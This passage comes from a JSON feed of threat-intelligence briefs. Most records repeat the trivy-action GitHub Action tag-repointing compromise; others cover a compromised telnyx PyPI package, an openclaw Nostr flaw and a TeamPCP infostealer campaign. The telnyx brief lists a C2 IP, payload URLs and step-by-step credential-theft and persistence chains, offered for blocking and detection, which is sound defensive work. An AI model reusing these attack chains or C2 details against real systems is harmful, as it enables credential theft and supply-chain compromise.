attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Script Execution in GitHub Actions Runner\u003c/code\u003e to identify potentially malicious script execution within GitHub Actions runner environments.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for unusual or unexpected activity, particularly scripts running from temporary directories, to detect deviations from expected CI/CD behavior.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and credential management policies for GitHub Actions secrets and credentials to minimize the impact of potential credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T08:36:29Z","date_published":"2026-03-31T08:36:29Z","id":"/briefs/2026-04-trivy-supply-chain/","summary":"The trivy-action GitHub Action was compromised via git tag repointing, where 76 of 77 release tags were retroactively poisoned, leading to a multi-stage credential theft operation discovered following a spike in script execution detections on Linux runners.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, a spike in suspicious script executions on Linux GitHub Actions runners was observed across multiple CrowdStrike Falcon platform customers. The investigation traced the activity to a supply chain compromise within the widely-used aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. Attackers retroactively poisoned 76 out of 77 release tags by repointing them to malicious commits. This allowed them to inject a multi-stage credential stealer into the action\u0026rsquo;s \u003ccode\u003eentrypoint.sh\u003c/code\u003e script. The malicious code executes before the legitimate scanner, making the compromise less noticeable. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary and has removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to exploit tag mutability in Git.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized write access to the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub repository.\u003c/li\u003e\n\u003cli\u003eThe attacker retroactively modifies existing Git tags (e.g., \u003ccode\u003e0.24.0\u003c/code\u003e) to point to a malicious commit.\u003c/li\u003e\n\u003cli\u003eThe malicious commit injects approximately 105 lines of malicious code into the \u003ccode\u003eentrypoint.sh\u003c/code\u003e script, prepended before the legitimate Trivy scanner logic.\u003c/li\u003e\n\u003cli\u003eA GitHub Actions workflow includes a step using the compromised \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e by referencing a poisoned tag (e.g., \u003ccode\u003e- uses: aquasecurity/trivy-action@0.24.0\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and executes the malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script.\u003c/li\u003e\n\u003cli\u003eThe malicious code in \u003ccode\u003eentrypoint.sh\u003c/code\u003e enumerates running processes to identify potential credential sources and exfiltrates sensitive data.\u003c/li\u003e\n\u003cli\u003eThe legitimate Trivy scanner executes, masking the malicious activity.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to stolen credentials, secrets, and API keys, potentially allowing them to compromise cloud infrastructure, internal systems, and source code repositories.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack directly impacted organizations using the compromised \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action in their CI/CD pipelines. The number of affected organizations is currently unknown, but given the action\u0026rsquo;s popularity, it is likely significant. Successful exploitation allows attackers to steal sensitive credentials, including API keys, cloud credentials, and deploy tokens. This can lead to unauthorized access to internal infrastructure, data exfiltration, and further compromise of the software supply chain. The incident highlights the critical importance of verifying the integrity of third-party dependencies and implementing robust security measures in CI/CD environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately audit your GitHub Actions workflows for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and update to a safe version (as provided by Aqua Security) or remove the action entirely.\u003c/li\u003e\n\u003cli\u003eImplement integrity checks for third-party GitHub Actions by verifying the commit SHA instead of relying solely on tags to mitigate tag re-pointing attacks.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for suspicious scripts, especially those running from within action directories, using process creation logs. An example detection rule is provided below.\u003c/li\u003e\n\u003cli\u003eEnable network connection logging on GitHub Actions runners to identify potential data exfiltration attempts originating from action scripts.\u003c/li\u003e\n\u003cli\u003eReview GitHub Actions logs for any anomalies or unexpected behavior that may indicate a compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T07:24:09Z","date_published":"2026-03-31T07:24:09Z","id":"/briefs/2026-04-trivy-action-supply-chain/","summary":"The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting malicious code into the entrypoint.sh script to steal credentials from CI/CD pipelines before executing the legitimate Trivy scanner.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-action-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike detected a spike in suspicious script executions on Linux-based GitHub Actions runners, which led to the discovery of a supply chain compromise affecting the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action. This action is a popular open-source vulnerability scanner frequently used in CI/CD pipelines. The attacker retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. These commits replaced the legitimate entry point with a multi-stage credential stealer. The injected code executes before the original scanner, allowing workflows to complete seemingly normally while secretly exfiltrating sensitive information. Aqua Security has confirmed and removed the malicious artifacts. This incident highlights the risks associated with mutable tags in Git-based workflows and the importance of verifying action integrity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains write access to the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e repository on GitHub.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the action\u0026rsquo;s \u003ccode\u003eentrypoint.sh\u003c/code\u003e script to include malicious code for credential theft. Specifically, the attacker prepends approximately 105 lines of malicious code.\u003c/li\u003e\n\u003cli\u003eThe attacker uses git tag repointing to retroactively poison existing release tags (e.g., \u003ccode\u003e@0.24.0\u003c/code\u003e) to point to the malicious commit.\u003c/li\u003e\n\u003cli\u003eDevelopers\u0026rsquo; CI/CD pipelines reference the compromised \u003ccode\u003etrivy-action\u003c/code\u003e using a poisoned tag (e.g., \u003ccode\u003eaquasecurity/trivy-action@0.24.0\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen a workflow runs, the GitHub Actions runner downloads and executes the malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script, granting it access to the runner\u0026rsquo;s environment, secrets, and network.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates running processes to identify potential targets for credential theft.\u003c/li\u003e\n\u003cli\u003eThe malicious code exfiltrates credentials and secrets.\u003c/li\u003e\n\u003cli\u003eThe original \u003ccode\u003etrivy\u003c/code\u003e scanner is executed, masking the malicious activity and allowing the workflow to complete normally.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the \u003ccode\u003etrivy-action\u003c/code\u003e GitHub Action allowed attackers to steal credentials and secrets from CI/CD pipelines that used the compromised action. Because the malicious code ran with the full privileges of the runner, it had access to sensitive information such as API keys, deployment tokens, and cloud credentials. The number of affected organizations is unknown, but given the widespread adoption of \u003ccode\u003etrivy-action\u003c/code\u003e, the potential impact is significant. Successful exploitation can lead to unauthorized access to cloud resources, code repositories, and other sensitive systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect your CI/CD pipeline configurations for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and audit the integrity of the referenced tags against the known good commits, if available from Aqua Security\u0026rsquo;s advisories.\u003c/li\u003e\n\u003cli\u003eImplement tooling and processes to verify the integrity of third-party GitHub Actions used in CI/CD pipelines.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for suspicious activity, such as enumeration of processes or unexpected network connections (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eEnable and review process creation logs on CI/CD runner environments to identify anomalous script execution (see Sigma rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T06:07:07Z","date_published":"2026-03-31T06:07:07Z","id":"/briefs/2026-04-trivy-action-compromise/","summary":"The trivy-action GitHub Action, a widely used vulnerability scanner in CI/CD pipelines, was compromised via git tag repointing to inject a multi-stage credential stealer, affecting 76 of 77 release tags.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-action-compromise/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","pypi","credential-theft","teampcp"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 27, 2026, the \u003ccode\u003etelnyx\u003c/code\u003e Python package on PyPI was compromised by TeamPCP, resulting in the distribution of malicious versions 4.87.1 and 4.87.2. The attacker, having gained unauthorized access to PyPI credentials, bypassed the legitimate GitHub release pipeline to upload these compromised packages directly. These versions contain malware designed to harvest sensitive credentials from infected systems and exfiltrate them to a command-and-control (C2) server. The malicious packages were available for approximately 6 hours before being quarantined by PyPI. Version 4.87.1 contained a typo preventing execution, making 4.87.2 the fully functional malicious version. This incident highlights the risk of supply chain attacks targeting open-source package repositories, potentially affecting any system that installed the \u003ccode\u003etelnyx\u003c/code\u003e package during the exposure window.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized access to PyPI credentials for the \u003ccode\u003etelnyx\u003c/code\u003e package.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads malicious versions 4.87.1 and 4.87.2 of the \u003ccode\u003etelnyx\u003c/code\u003e package to PyPI, bypassing the legitimate GitHub repository.\u003c/li\u003e\n\u003cli\u003eWhen a user installs or upgrades to the malicious \u003ccode\u003etelnyx\u003c/code\u003e package, the injected malware within \u003ccode\u003etelnyx/_client.py\u003c/code\u003e executes upon importing the library (\u003ccode\u003eimport telnyx\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eOn Linux/macOS systems, the malware spawns a detached subprocess to ensure persistence and downloads a payload hidden inside a WAV audio file (\u003ccode\u003eringtone.wav\u003c/code\u003e) from the C2 server at \u003ccode\u003ehttp://83.142.209.203:8080/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload harvests sensitive credentials, including SSH keys, AWS/GCP/Azure credentials, Kubernetes tokens, Docker configurations, .env files, database credentials, and crypto wallets.\u003c/li\u003e\n\u003cli\u003eIf Kubernetes access is detected, the malware deploys privileged pods to all nodes for lateral movement within the Kubernetes cluster.\u003c/li\u003e\n\u003cli\u003eThe collected data is encrypted using AES-256-CBC and RSA-4096, then exfiltrated to the C2 server, identified by the header \u003ccode\u003eX-Filename: tpcp.tar.gz\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eOn Windows, a binary payload hidden in \u003ccode\u003ehangup.wav\u003c/code\u003e is downloaded from \u003ccode\u003ehttp://83.142.209.203:8080/\u003c/code\u003e, dropped as \u003ccode\u003emsbuild.exe\u003c/code\u003e in the Startup folder for persistence, and executed with a hidden window, polling the endpoint \u003ccode\u003ehttp://83.142.209.203:8080/raw\u003c/code\u003e.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the \u003ccode\u003etelnyx\u003c/code\u003e PyPI package poses a significant risk to developers and organizations that use the library.  Successful exploitation leads to the theft of sensitive credentials, potentially granting the attacker unauthorized access to critical infrastructure, cloud resources, and sensitive data. TeamPCP\u0026rsquo;s previous campaign against LiteLLM and the similarities in this attack suggest a pattern of targeting open-source projects to infiltrate developer environments and steal secrets.  The impact includes potential data breaches, financial losses, and reputational damage. The exposure window was approximately 6 hours during which vulnerable versions were available.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately check for the presence of malicious \u003ccode\u003etelnyx\u003c/code\u003e package versions (4.87.1 or 4.87.2) in your environment using the provided commands and uninstall them (\u003ccode\u003epip uninstall telnyx\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDue to the credential-stealing nature of the malware, rotate all potentially exposed secrets, including SSH keys, cloud provider credentials (AWS, GCP, Azure), Kubernetes tokens, Docker registry credentials, database passwords, API keys in .env files, and Telnyx API keys.\u003c/li\u003e\n\u003cli\u003eCheck for persistence mechanisms used by the malware, specifically the \u003ccode\u003eaudiomon\u003c/code\u003e service and associated files on Linux/macOS, and the \u003ccode\u003emsbuild.exe\u003c/code\u003e executable in the Startup folder on Windows, based on the file paths provided in the \u0026ldquo;Filesystem\u0026rdquo; section.\u003c/li\u003e\n\u003cli\u003eBlock the identified C2 IP address (\u003ccode\u003e83.142.209.203\u003c/code\u003e) and payload URLs (\u003ccode\u003ehttp://83.142.209.203:8080/ringtone.wav\u003c/code\u003e, \u003ccode\u003ehttp://83.142.209.203:8080/hangup.wav\u003c/code\u003e, \u003ccode\u003ehttp://83.142.209.203:8080/raw\u003c/code\u003e) at your network perimeter.\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect the creation of \u003ccode\u003emsbuild.exe\u003c/code\u003e in the Startup folder.\u003c/li\u003e\n\u003cli\u003ePin the \u003ccode\u003etelnyx\u003c/code\u003e package to the safe version 4.87.0 in your project dependencies to prevent future installations of compromised versions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-30T19:15:30Z","date_published":"2026-03-30T19:15:30Z","id":"/briefs/2026-03-telnyx-pypi-compromise/","summary":"A threat actor compromised the PyPI package `telnyx`, uploading malicious versions 4.87.1 and 4.87.2 containing credential-stealing malware that exfiltrates data to a C2 server.","title":"Compromised Telnyx PyPI Package Distributes Credential-Stealing Malware","url":"https://feed.craftedsignal.io/briefs/2026-03-telnyx-pypi-compromise/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","github-actions"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike\u0026rsquo;s Engineering team discovered a supply chain compromise targeting the aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. The attackers retroactively poisoned 76 of the scanner’s 77 release tags using git tag repointing, replacing the original entry point with a multi-stage credential stealer. The malicious code operates before the legitimate scanner, masking its activity and allowing workflows to appear normal. This attack highlights the risks associated with mutable tags in Git and the potential for widespread compromise when relying on third-party actions within CI/CD environments. Defenders should implement strong integrity checks and consider using immutable references to mitigate such risks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains write access to the aquasecurity/trivy-action repository.\u003c/li\u003e\n\u003cli\u003eThe attacker uses git tag repointing to modify existing release tags (e.g., 0.24.0), replacing the legitimate entrypoint.sh script with a malicious version.\u003c/li\u003e\n\u003cli\u003eA developer\u0026rsquo;s CI/CD pipeline includes a step that uses the compromised trivy-action by referencing a poisoned tag (e.g., uses: \u003ca href=\"mailto:aquasecurity/trivy-action@0.24.0\"\u003eaquasecurity/trivy-action@0.24.0\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eWhen the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and executes the malicious entrypoint.sh script.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates running processes to identify potential credential sources.\u003c/li\u003e\n\u003cli\u003eThe script steals credentials and secrets from the runner\u0026rsquo;s environment, including API keys, deployment tokens, and cloud credentials.\u003c/li\u003e\n\u003cli\u003eAfter stealing credentials, the malicious script executes the legitimate Trivy scanner to avoid raising suspicion.\u003c/li\u003e\n\u003cli\u003eThe stolen credentials are used to gain unauthorized access to internal infrastructure and resources.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the trivy-action GitHub Action could impact a significant number of organizations relying on this popular scanner in their CI/CD pipelines. With 76 of 77 release tags poisoned, the potential scope of the attack is broad. Successful exploitation leads to the theft of sensitive credentials, enabling attackers to access internal infrastructure, deploy malicious code, or exfiltrate sensitive data. The silent nature of the attack, with the legitimate scanner still running, makes detection challenging and increases the dwell time of the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process monitoring on GitHub Actions runners to detect suspicious script execution and unusual process trees (reference: Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement integrity checks for third-party actions used in CI/CD pipelines to verify their authenticity and prevent tampering (reference: Overview).\u003c/li\u003e\n\u003cli\u003eConsider using immutable references (e.g., commit SHAs instead of tags) for GitHub Actions to prevent tag repointing attacks (reference: Overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule below to detect suspicious bash scripts executing in the context of GitHub Action runners (reference: rules).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-30T06:24:43Z","date_published":"2026-03-30T06:24:43Z","id":"/briefs/2026-03-trivy-action-supply-chain/","summary":"The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting a multi-stage credential stealer into CI/CD pipelines, allowing for the theft of secrets and credentials.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-action-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","github-actions"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, a spike in script execution detections on Linux-based GitHub Actions runners led to the discovery of a supply chain compromise affecting the aquasecurity/trivy-action GitHub Action. The attackers retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. This manipulation replaced the legitimate entry point with a multi-stage credential stealer. The malicious code operates silently before the legitimate Trivy scanner logic is executed, which allows the malicious activity to remain hidden as workflows appear to complete normally. Aqua Security has confirmed the compromise and removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to gain access to sensitive credentials and internal infrastructure.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer triggers a GitHub Actions workflow that utilizes the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe GitHub Actions runner downloads the specified version of the \u003ccode\u003etrivy-action\u003c/code\u003e from GitHub.\u003c/li\u003e\n\u003cli\u003eDue to tag repointing, the downloaded action contains malicious code in the \u003ccode\u003eentrypoint.sh\u003c/code\u003e script.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script executes a multi-stage credential theft operation.\u003c/li\u003e\n\u003cli\u003eThe script enumerates process IDs (PIDs) to discover runner processes.\u003c/li\u003e\n\u003cli\u003eAfter credential theft, the legitimate Trivy scanner logic is executed to maintain the appearance of normal operation.\u003c/li\u003e\n\u003cli\u003eStolen credentials and secrets are likely exfiltrated to a attacker controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the trivy-action GitHub Action could have resulted in widespread credential theft across numerous organizations using the affected versions. With 76 of 77 release tags poisoned, a vast majority of users were exposed. Successful credential theft can lead to unauthorized access to sensitive systems, data breaches, and potential supply chain attacks affecting downstream customers. The incident highlights the critical importance of supply chain security and the need for robust monitoring and detection mechanisms in CI/CD pipelines.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect your CI/CD pipelines for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action and verify the integrity of the action being used.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u003ccode\u003eDetect Suspicious Script Execution in GitHub Actions Runner\u003c/code\u003e to identify potentially malicious script execution within GitHub Actions runners.\u003c/li\u003e\n\u003cli\u003eMonitor process execution within GitHub Actions runners for unusual or unexpected activity that deviates from normal CI/CD operations (reference: Attack Chain step 5).\u003c/li\u003e\n\u003cli\u003eEnable detailed logging on GitHub Actions runners to capture process execution, network connections, and file system activity for forensic analysis and threat hunting.\u003c/li\u003e\n\u003cli\u003eImplement strong access controls and least privilege principles for GitHub Actions secrets and credentials to limit the impact of potential credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T08:12:22Z","date_published":"2026-03-28T08:12:22Z","id":"/briefs/2026-03-trivy-action-compromise/","summary":"The trivy-action GitHub Action was compromised via git tag repointing, with attackers poisoning 76 of 77 release tags to inject a multi-stage credential stealer before the legitimate scanner runs, granting attackers access to CI/CD pipeline secrets.","title":"Compromised trivy-action GitHub Action Enables Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-action-compromise/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","vulnerability","npm"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe \u003ccode\u003eopenclaw\u003c/code\u003e npm package, a tool likely used for decentralized communication or cryptocurrency-related applications, contains a vulnerability affecting versions prior to 2026.3.22. Specifically, the vulnerability lies in the handling of inbound Direct Messages (DMs) within the Nostr protocol implementation. The flaw allows for crypto operations and dispatch work to be triggered before proper sender and pairing policy enforcement. This means an attacker could potentially initiate resource-intensive computations on a vulnerable system without proper authentication or authorization. The issue was reported by @kuranikaran and resolved in version 2026.3.22 with improvements to authorization checks in \u003ccode\u003eextensions/nostr/src/channel.ts\u003c/code\u003e and the introduction of pre-crypto authorization and rate-limiting guardrails in \u003ccode\u003eextensions/nostr/src/nostr-bus.ts\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious Nostr DM specifically designed to trigger computationally expensive crypto operations within OpenClaw.\u003c/li\u003e\n\u003cli\u003eAttacker sends the malicious DM to a user running a vulnerable version of the \u003ccode\u003eopenclaw\u003c/code\u003e package.\u003c/li\u003e\n\u003cli\u003eThe OpenClaw application receives the DM and, due to the vulnerability, proceeds to decrypt the message content before validating the sender\u0026rsquo;s authorization.\u003c/li\u003e\n\u003cli\u003eOpenClaw attempts to perform cryptographic operations, such as decryption or signature verification, based on the contents of the malicious DM.\u003c/li\u003e\n\u003cli\u003eThe application dispatches internal tasks or events based on the decrypted (but unauthorized) message content.\u003c/li\u003e\n\u003cli\u003eRepeatedly sending these crafted messages can lead to denial of service due to CPU exhaustion or memory over-utilization.\u003c/li\u003e\n\u003cli\u003e(If applicable) Depending on the purpose of the cryptographic operations, the attacker may be able to glean partial information or influence the application\u0026rsquo;s state without full authentication.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability could lead to denial-of-service conditions due to excessive CPU usage and memory consumption on systems running vulnerable versions of OpenClaw. Attackers could potentially trigger resource-intensive cryptographic operations without proper authorization, impacting the availability and performance of the application. In specific scenarios, and depending on the application\u0026rsquo;s functionality, partial information disclosure or unauthorized state changes might be possible. This vulnerability affects any application using the \u003ccode\u003eopenclaw\u003c/code\u003e npm package prior to version 2026.3.22.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the \u003ccode\u003eopenclaw\u003c/code\u003e npm package to version 2026.3.22 or later to remediate the vulnerability (reference affected versions).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusually high volumes of inbound Nostr DM messages targeting applications using the \u003ccode\u003eopenclaw\u003c/code\u003e package (network_connection log source).\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on Nostr DM processing to prevent denial-of-service attacks (network_connection/firewall log source).\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect suspicious activity related to the vulnerable code paths (process_creation/file_event log source).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T19:09:45Z","date_published":"2026-03-26T19:09:45Z","id":"/briefs/2026-04-openclaw-unauth-crypto/","summary":"The openclaw npm package before version 2026.3.22 allows unauthorized pre-authentication computation due to improper handling of inbound Nostr DMs, where crypto and dispatch work are performed before enforcing sender and pairing policies.","title":"OpenClaw Nostr DM Unauthorized Crypto Computation Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-openclaw-unauth-crypto/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","ci/cd","infostealer"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eTeamPCP is conducting a supply chain attack targeting multiple companies through the compromise of their CI/CD pipelines and GitHub accounts. The attack involves an infostealer designed to harvest sensitive information such as credentials from CI environments, contents of .env files, and cloud tokens. The compromised credentials allowed the attackers to gain unauthorized access and potentially inject malicious code into the software development lifecycle. The attack has impacted projects including Trivy, KICS, and LiteLLM, suggesting a broad targeting scope within the software development and cloud security sectors. This type of attack poses a significant risk to the integrity and security of the software supply chain, as compromised code can be distributed to numerous downstream users.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial compromise of a developer\u0026rsquo;s machine or CI/CD environment via an unspecified initial access vector.\u003c/li\u003e\n\u003cli\u003eDeployment of an infostealer binary onto the compromised system.\u003c/li\u003e\n\u003cli\u003eThe infostealer scans the local file system for .env files containing sensitive credentials.\u003c/li\u003e\n\u003cli\u003eThe infostealer targets CI/CD environment variables to extract API keys, tokens, and other secrets.\u003c/li\u003e\n\u003cli\u003eThe infostealer searches for cloud tokens, potentially targeting AWS credentials, Azure service principals, or GCP service account keys.\u003c/li\u003e\n\u003cli\u003eExtracted credentials are used to gain unauthorized access to GitHub accounts and CI/CD pipelines.\u003c/li\u003e\n\u003cli\u003eAttackers inject malicious code or dependencies into the targeted projects, potentially leading to supply chain contamination.\u003c/li\u003e\n\u003cli\u003eCompromised code is distributed to downstream users of Trivy, KICS, LiteLLM, and other impacted projects.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe TeamPCP supply chain attack has impacted multiple companies and projects, including Trivy, KICS, and LiteLLM. The compromise of CI/CD pipelines and GitHub accounts allows attackers to inject malicious code into software projects, potentially affecting thousands of users. This can lead to data breaches, malware infections, and erosion of trust in the affected software. The exact number of victims is unknown, but the impact is significant due to the widespread use of the compromised projects in the cloud security and development sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) on all GitHub accounts and CI/CD pipelines to prevent unauthorized access.\u003c/li\u003e\n\u003cli\u003eRotate API keys and tokens regularly, especially those used in CI/CD environments, to minimize the impact of credential theft.\u003c/li\u003e\n\u003cli\u003eImplement secrets scanning in CI/CD pipelines to prevent accidental exposure of sensitive information in code repositories.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Infostealer Activity in CI/CD Environments\u0026rdquo; to identify suspicious processes accessing environment variables.\u003c/li\u003e\n\u003cli\u003eMonitor file system access for unusual reads of .env files, using the \u0026ldquo;Detect .env File Access\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect anomalous connections originating from CI/CD servers or developer workstations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T12:00:00Z","date_published":"2026-03-26T12:00:00Z","id":"/briefs/2026-03-teampcp-supply-chain/","summary":"TeamPCP compromised CI/CD pipelines and GitHub accounts of multiple companies by deploying an infostealer to extract credentials from CI environments, .env files, and cloud tokens, impacting projects like Trivy, KICS, and LiteLLM.","title":"TeamPCP Supply Chain Attack via CI/CD Compromise","url":"https://feed.craftedsignal.io/briefs/2026-03-teampcp-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","malware","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 25, 